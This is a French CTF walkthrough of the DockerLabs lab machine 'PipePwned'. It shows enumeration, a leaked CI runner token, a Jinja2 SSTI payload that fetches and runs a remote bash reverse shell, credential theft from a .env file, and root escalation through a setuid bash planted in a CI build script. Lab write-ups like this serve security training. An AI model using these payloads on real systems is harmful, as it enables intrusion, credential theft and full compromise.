PipePwned
**** Adresse IP cible
┌──(d4fl0n㉿kali)-[~/dockerlabs]
└─$ sudo ./auto_deploy.sh pipepwned.tar
[sudo] password for d4fl0n:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
**** numérisation des ports
┌──(d4fl0n㉿kali)-[~] └─$ nmap -p- 172.17.0.2 Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-14 12:48 -0400 Nmap scan report for trailpack.es (172.17.0.2) Host is up (0.0000050s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 86:E8:41:4A:AB:55 (Unknown) ┌──(d4fl0n㉿kali)-[~] └─$ nmap -p 22,80 -A -O -sCV 172.17.0.2 Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-14 12:49 -0400 Nmap scan report for trailpack.es (172.17.0.2) Host is up (0.00017s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.16 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 d4:18:2e:bc:1e:06:58:73:24:7d:cd:f8:74:b3:72:41 (ECDSA) |_ 256 e6:a8:6b:06:d9:65:cd:48:ed:cf:b2:11:f1:ab:ba:3e (ED25519) 80/tcp open http Gunicorn |_http-title: MASoftware \xC2\xB7 CI/CD Console |_http-server-header: gunicorn MAC Address: 86:E8:41:4A:AB:55 (Unknown) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 6.18 (94%), Android 11 (Linux 4.9) (93%), Android 12 (Linux 5.4) (93%), Linux 3.8 (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
**** énumération ssh
┌──(d4fl0n㉿kali)-[~] └─$ ssh 172.17.0.2 The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established. ED25519 key fingerprint is: SHA256:K1S75OJ7TZ5z0QRgEvIYhtdFcMWKf/EmfZu20bfqUuc This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts. d4fl0n@172.17.0.2's password:
**** la connexion au ssh par mot de passe est autoriser
**** énumération web
Pasted image 20260814180508.png
┌──(d4fl0n㉿kali)-[~] └─$ dirsearch -u http://172.17.0.2/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/d4fl0n/reports/http_172.17.0.2/__26-08-14_12-54-53.txt Target: http://172.17.0.2/ [12:54:53] Starting: [12:56:00] 200 - 3B - /health Task Completed
**** nous n'avons rien trouver d'intéressent après le brute force, mais y'a une échec de déploiement d'un projet CI/CD qui nous divulgue des information intéressent
┌──(d4fl0n㉿kali)-[~] └─$ curl http://172.17.0.2/api/jobs/126/trace Running with gitlab-runner (shell executor) on self-hosted-01 $ echo "Deploying $CI_PROJECT_NAME on runner $CI_RUNNER_DESCRIPTION" Deploying payments-api on runner self-hosted-01 $ env | grep -iE 'ci_|builds' # TODO: remove debug CI_REGISTRY=registry.masoftware.dl CI_RUNNER_SHELL=/bin/bash CI_JOB_STAGE=deploy CI_BUILDS_DIR=/opt/ci/builds CI_RUNNER_TOKEN=glrt-9ef2bb338750bea3f20e $ id # runner runs each job under its own user uid=0(root) gid=0(root) groups=0(root) $ ./deploy.sh bash: ./deploy.sh: No such file or directory Job failed: exit code 127
**** nous avons trouver un faille SSTI dans le champs ref
┌──(d4fl0n㉿kali)-[~/dockerlabs]
└─$ curl 'http://172.17.0.2/pipelines/new' \
-X POST \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Referer: http://172.17.0.2/' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://172.17.0.2' \
-H 'Connection: keep-alive' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'Priority: u=0, i' \
--data-raw 'name=deploy-manual&ref=name%3D%7B%7B7*7%7D%7D'
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>MASoftware · CI/CD Console</title>
<link rel="stylesheet" href="/static/style.css">
</head>
<body>
<header>
<div class="logo">MASoftware</div>
<nav><span>Self-hosted CI/CD Console</span><span class="env">runner: self-hosted-01</span></nav>
</header>
<main>
<h1>Pipeline Result</h1>
<section class="card">
<p class="banner">Pipeline <strong>deploy-manual</strong> sent to queue for ref <code>name=49</code> on runner <em>self-hosted-01</em>.</p>
<p class="muted">Target Ref: <code>name={{7*7}}</code></p>
<a href="/">← back to dashboard</a>
</section>
</main>
<footer><span>MASoftware DevOps · console v1.0 · gitlab-runner (shell executor)</span></footer>
</body>
</html>
Pasted image 20260814190632.png
**** nous allons déterminer le Template
Pasted image 20260814190737.png
**** il s'agit probablement du Template jinja2 ou twig
Pasted image 20260814190859.png
**** nous avons la permission de l'utilisateur ciapp
**** reverse shell
┌──(d4fl0n㉿kali)-[~] └─$ cat shell #!/bin/bash /usr/bin/bash -i >& /dev/tcp/172.17.0.1/4444 0>&1
***payload
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl http://172.17.0.1/shell | bash').read() }}
ciapp@ca3a8dd44554:/opt/app$ id
uid=1000(ciapp) gid=1000(ciapp) groups=1000(ciapp)
ciapp@ca3a8dd44554:/opt/app$
**** escalade de privilèges
**** énumérons les utilisateurs system
ciapp@ca3a8dd44554:~$ getent passwd | grep -i bash root:x:0:0:root:/root:/bin/bash ciapp:x:1000:1000::/home/ciapp:/bin/bash devops:x:1001:1001::/home/devops:/bin/bash ciapp@ca3a8dd44554:~$
**** énumérons les fichier system
ciapp@ca3a8dd44554:/opt/ci$ ls -la total 28 drwxr-xr-x 1 root root 4096 Aug 8 18:40 . drwxr-xr-x 1 root root 4096 Aug 8 18:40 .. -rw-r----- 1 ciapp ciapp 189 Jul 18 20:04 .env drwxrwsr-x 1 root devops 4096 Aug 14 17:45 builds -rwx--x--x 1 root root 813 Jul 18 19:12 runner.sh ciapp@ca3a8dd44554:/opt/ci$ cat .env # Runner base config: /etc/gitlab-runner/config.toml CI_REGISTRY=registry.masoftware.dl CI_RUNNER_TOKEN=glrt-9ef2bb338750bea3f20e DEVOPS_SSH_USER=devops DEVOPS_SSH_PASS=MAS0ftware_202607!
**** nous avons trouver le fichier .env qui contient les identifiant de connexion de l'utilisateur devops, essayons de se connecter a son compte
ciapp@ca3a8dd44554:/opt/ci$ su devops Password: devops@ca3a8dd44554:/opt/ci$ id uid=1001(devops) gid=1001(devops) groups=1001(devops) devops@ca3a8dd44554:/opt/ci$
**** nous somme maintenant connecter entant que devops
**** nous allons lire le fichier de configuration gitlab-runner
ciapp@ca3a8dd44554:/opt/ci$ cat /etc/gitlab-runner/config.toml concurrent = 1 check_interval = 20 log_level = "info" [session_server] session_timeout = 1800 [[runners]] name = "self-hosted-01" url = "https://gitlab.masoftware.dl/" id = 1 token = "glrt-9ef2bb338750bea3f20e" executor = "shell" # Script gets executed with the privileges of the user running the runner service builds_dir = "/opt/ci/builds" environment_file = "/opt/ci/.env" # TODO: service runs as root, migrate to a non-root user
**** nous allons un fenêtre d'intervalle de 20 second pour exécuter et supprimer notre script de un dossier /opt/ci/builds, vérifions la permission d'écriture pour le priv root
ciapp@ca3a8dd44554:/opt/ci$ ls -la total 28 drwxr-xr-x 1 root root 4096 Aug 8 18:40 . drwxr-xr-x 1 root root 4096 Aug 8 18:40 .. -rw-r----- 1 ciapp ciapp 189 Jul 18 20:04 .env drwxrwsr-x 1 root devops 4096 Aug 14 19:24 builds
**** nous avons la permission d'écriture, créons notre script
devops@ca3a8dd44554:/opt/ci/builds$ echo 'chmod +s /bin/bash' > deploy.sh && chmod +x deploy.sh devops@ca3a8dd44554:/opt/ci/builds$ ls deploy.sh devops@ca3a8dd44554:/opt/ci/builds$ ls -la /bin/bash -rwsr-sr-x 1 root root 1396520 Mar 14 2024 /bin/bash devops@ca3a8dd44554:/opt/ci/builds$
**** root
devops@ca3a8dd44554:/opt/ci/builds$ /bin/bash -p bash-5.1# id uid=1001(devops) gid=1001(devops) euid=0(root) egid=0(root) groups=0(root),1001(devops) bash-5.1#
**** flag
bash-5.1# cat /home/devops/user_flag.txt /root/root_flag.txt 30e3108dbbf867259a30a459770dd25c cff89c3a4ea6977b2213c344a4a84650 bash-5.1# root@ca3a8dd44554:~# id;hostname uid=0(root) gid=0(root) groups=0(root) ca3a8dd44554 root@ca3a8dd44554:~#